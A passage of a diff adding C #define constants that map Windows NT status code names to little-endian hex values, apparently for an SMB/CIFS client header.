++#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
++#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
++#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
++#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
++#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
++#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
++#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
++#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
++#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
++#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
++#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
++#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
++#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
++#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
++#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
++#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
++#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
++#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
++#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
++#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
++#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
++#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
++#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
++#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
++#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
++#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
++#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
++#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
++#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
++#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
++#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
++#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
++#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
++#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
++#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
++#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
++#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
++#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
++#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
++#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
++#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
++#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
++#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
++#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
++#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
++#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
++#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
++#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
++#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
++#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
++#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
++#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
++#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
++#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
++#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
++#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
++#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
++#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
++#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
++#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
++#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
++#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
++#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
++#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
++#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
++#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
++#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
++#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
++#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
++#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
++#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
++#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
++#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
++#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
++#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
++#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
++#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
++#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
++#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
++#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
++#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
++#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
++#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
++#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
++#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
++#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
++#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
++#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
++#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
++#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
++#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
++#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
++#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
++#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
++#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
++#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
++#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
++#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
++#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
++#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
++#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
++#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
++#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
++#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
++#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
++#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
++#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
++#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
++#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
++#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
++#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
++#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
++#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
++#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
++#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
++#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
++#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
++#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
++#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
++#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
++#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
++#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
++#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
++#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
++#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
++#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
++#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
++#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
++#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
++#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
++#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
++#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
++#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
++#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
++#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
++#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
++#define STATUS_RETRY cpu_to_le32(0xC000022D)
++#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
++#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
++#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
++#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
++#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
++#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
++#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
++#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
++#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
++#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
++#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
++#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
++#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
++#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
++#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
++#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
++#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
++#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
++#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
++#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
++#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
++#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
++#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
++#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
++#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
++#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
++#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
++#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
++#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
++#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
++#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
++#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
++#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
++#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
++#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
++#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
++#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
++#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
++#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
++#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
++#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
++#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
++#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
++#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
++#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
++#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
++#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
++#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
++#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
++#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
++#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
++#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
++#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
++#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
++#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
++#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
++#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
++#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
++#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
++#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
++#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
++#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
++#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
++#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
++#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
++#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
++#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
++#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
++#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
++#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
++#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
++#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
++#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
++#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
++#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
++#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
++#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
++#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
++#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
++#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
++#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
++#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
++#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
++#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
++#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
++#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
++#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
++#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
++#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
++#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
++#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
++#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
++#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
++#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
++#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
++#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
++#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
++#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
++#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
++#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
++#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
++#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
++#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
++#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
++#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
++#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
++#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
++#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
++#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
++#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
++#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
++#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
++#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
++#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
++#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
++#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
++#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
++#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
++#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
++#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
++#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
++#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
++#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
++#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
++#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
++#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
++#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
++#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
++#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
++#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
++#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
++#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
++#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
++#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
++#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
++#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
++#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
++#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
++#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
++#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
++#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
++#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
++#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
++#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
++#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
++#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
++#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
++#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
++#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
++#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER	\
++	cpu_to_le32(0xC00002DB)
++#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
++#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
++#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
++#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
++#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
++#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
++#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
++#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
++#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
++#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
++#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
++#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
++#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
++#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
++#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
++#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
++#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
++#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
++#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
++#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
++#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
++#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
++#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
++#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
++#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
++#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
++#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
++#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
++#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
++#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
++#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
++#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
++#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
++#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
++#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
++#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
++#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
++#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
++#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
++#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
++#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
++#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
++#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
++#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
++#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
++#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
++#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
++#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
++#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
++#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
++#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
++#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
++#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
++#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
++#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
++#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
++#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
++#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
++#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
++#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
++#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
++#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
++#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
++#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
++#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
++#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
++#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
++#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
++#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
